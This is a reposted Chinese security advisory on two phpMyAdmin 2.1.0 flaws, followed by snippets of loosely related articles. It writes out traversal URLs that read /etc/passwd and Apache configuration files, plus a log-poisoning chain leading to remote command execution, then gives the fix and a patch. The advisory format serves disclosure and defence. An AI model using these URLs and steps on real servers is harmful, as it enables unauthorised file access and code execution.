phpMyAdmin ( http://www.phpwizard.net/projects/phpMyAdmin/ ) 是一款管理 MySQL 数据库的 PHP 工具,具有基于 WEB 的界面。但是发现它存在漏洞。可选择安装新发布稳定版本:
phpMyAdmin 2.2.0。
1、目录遍历漏洞
攻击者通过提供如下的 URL:
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/passwd&btnDrop=No (*)
http://www.example.com/phpMyAdmin/tbl_replace.php?db=test&table=ess&goto=/etc/passwd
能非法访问系统文件
有问题的代码在:
‘include($goto);‘ in sql.php and in tbl_replace.php.
2、执行攻击者代码漏洞
通过使用全局可写日志文件,攻击者能在受影响服务器上执行任意代码。
首先,得到 Apache 配置文件以便知道日志文件存储位置:
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/httpd.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/srm.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/access.conf&btnDrop=No
可以看出,日志放在:
/var/log/httpd/error_log
/var/log/httpd/access_log
然后 telnet 到 端口80
# telnet www.example.com 80
Trying xxx.xxx.xxx.xxx...
Connected to www.example.com.
Escape character is ‘^]‘.
GET
^]
telnet> quit
Connection closed.
#
在 GET 请求之后,攻击者能将任意 PHP 代码上传
现在,可以用 Apache 用户身份远程运行命令了:
http://www.example.com/phpMyAdmin/sql.php?goto=/var/log/httpd/
access_log&btnDrop=No?meters=ls%20-l%20/
受影响系统:
phpMyAdmin 2.1.0
解决方案:
建议:
1.使用 phpMyAdmin 2.2.0
http://prdownloads.sourceforge.net/phpmyadmin/phpMyAdmin-2.2.0-php.tar.gz
2.用户下载安装补丁:
http://www.securereality.com.au/patches/phpMyAdmin-SecureReality.diff
摘自:52w.net
phpMyAdmin2.1.0存在两个漏洞
时间: 2024-10-26 10:01:40
phpMyAdmin2.1.0存在两个漏洞的相关文章
MySQL管理员须知的两大漏洞与修复方法
上月末,一位名叫Dawid Golunski的波兰黑客发现了MySQL中存在的两个关键漏洞:远程root代码执行漏洞和权限升级漏洞.MySQL,MariaDB和Percona Server的管理员需要检查其数据库版本了,因为攻击者可以通过链接这两个关键漏洞,完全接管数据库服务器. 根据Dawid Golunski的观点,这两个关键漏洞可以导致任意代码执行,root权限升级和服务器损坏影响MySQL和其衍生版本,如Percona Server,Percona XtraDB Cluster和Mari
Android系统两大漏洞曝光:影响超10亿台设备
安全研究人士周四披露了谷歌Android移动操作系统的两大严重漏洞,这些漏洞令超过10亿台Android设备面临被黑的风险. 研究人士称,这意味着"几乎每台Android设备"都会受到影响,无论其所搭载的是1.0版本Android系统还是最新的5.0版本. 黑客可利用这些漏洞欺骗用户访问含有恶意MP3或MP4文件的网站,一旦用户预览被感染的多媒体文件(通常以音乐或视频方式出现),则其 Android设备就会迅速被黑.这种被黑风险所涉及的问题是Android处理多媒体文件元数据的方式,该
如何禁用IE浏览器SSL3.0去除电脑网络安全漏洞
如何禁用IE浏览器SSL3.0去除电脑网络安全漏洞 谷歌发现了一个广泛存在于SSL3.0的安全漏洞,该漏洞可导致网络中传输的数据被黑客监听,劫持用户与网站之间传输的数据,窃取用户名.密码等敏感信息.因为SSL3.0协议存在着严重的安全漏洞,因此我们需要在电脑IE浏览器中禁用SSL3.0来去除电脑网络安全漏洞. 这个漏洞的代号为PODDLE(Padding Oracle On Downgraded Legacy Encryption),攻击者甚至还可以随意篡改用户接收到的信息
开发者论坛一周精粹(第九期):Joomla!3.7.0 Core SQL注入漏洞
第九期(2017年5月15日-2017年5月21日 ) 2017年5月17日,国外研究人员发现开源CMS软件Joomla!3.7.0 Core 版本里面发现一个SQL注入漏洞攻击,该漏洞风险较高,可能存在数据泄露的风险. [漏洞公告]Joomla!3.7.0 Core SQL注入漏洞 作者:正禾 码栈惊喜赋能618大促 释放工作量轻松备战! 作者:码栈小二 终极告白--com域名批量注册39元/首年! 作者:万小域 是时候亮出你的wang牌了!wang注册/续费/转入限时优惠! 作者:万小域 五
mfc-VC6.0 MFC两个对话框之间的数据通信
问题描述 VC6.0 MFC两个对话框之间的数据通信 做的一个成绩查询系统,想实现先登录,再查询我在第一个对话框中输入学号,密码,登陆成功 UpdateData(true);variant_t var; CString strName = """"; _ConnectionPtr m_pConnection; _CommandPtr m_pCommand; _RecordsetPtr m_pRecordset; CString SQL; char*STRSQL; S
java-JSP用JAVABEAN传整型值时,如果数值为一位,接收到的值为0,两位以上的值正常。
问题描述 JSP用JAVABEAN传整型值时,如果数值为一位,接收到的值为0,两位以上的值正常. 现象如题,环境为MYECLIPSE和TOMCAT6,代码如下: 提交数据的文件department_add.jsp: <%@ page contentType="text/html" pageEncoding = "GBK"%> <%@ page import="com.lb.teashop.factory.*,com.lb.teashop.
穷举法破解密码-MPI+VC6.0进行两台PC的并行计算,穷举法破解6-12位的密码(字母和数字组合)的MPI程序
问题描述 MPI+VC6.0进行两台PC的并行计算,穷举法破解6-12位的密码(字母和数字组合)的MPI程序 10C 需要分配任务,任务不知道怎么分配,我打算写控制台程序,先提示输入密码,用"*"显示,然后破解密码,显示密码是什么.怎么写这个程序啊,谢谢各位大神了.我在网上找了好多资料,可是估计是因为编程能力太差,实在写不出来啊.求大家帮帮忙,比较着急这个,谢谢 解决方案 我搭建好了MPI运行环境,只是遇到编程就傻了,实在编不出来,能给出程序吗?本身编程能力比较差,现在马上要交毕业设计
IIS 6.0文件夹解析漏洞的补救办法
中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 事件:早前有暴出一个IIS6.0下文件名解析漏洞,遇到upload/1.asp/200912041704063114.jpg会自动解析成asp文件执行.此漏洞产生在IIS6.0,处理文件夹扩展名出错导致以.asp命名的文件夹后面的文件直接以asp代码执行.所以无论*.asp文件夹后面是什么格式的文件都被当作ASP程序执行.同理可得只要是可执行
智能手机的这两大漏洞让90%用户陷入危险
中介交易 SEO诊断 淘宝客 云主机 技术大厅 [摘要]这些漏洞可令黑客远程控制手机设备,安装恶意软件.访问数据. 腾讯科技讯 8月1日,据路透社报道,安全研究人员警告称,当前智能手机存在两大管理漏洞,可能让世界20亿用户中90%的人陷入危险中,包括密码.数据被偷,手机完全被黑客控制等. 丹佛网络安全公司Accuvant的手机研究人员马修·索尔尼克(Mathew Solnik)说,一个漏洞是苹果.谷歌(微博)Android以及黑莓等智能手机制造商执行模糊的行业标准,试图控制和管理一切,从网络连接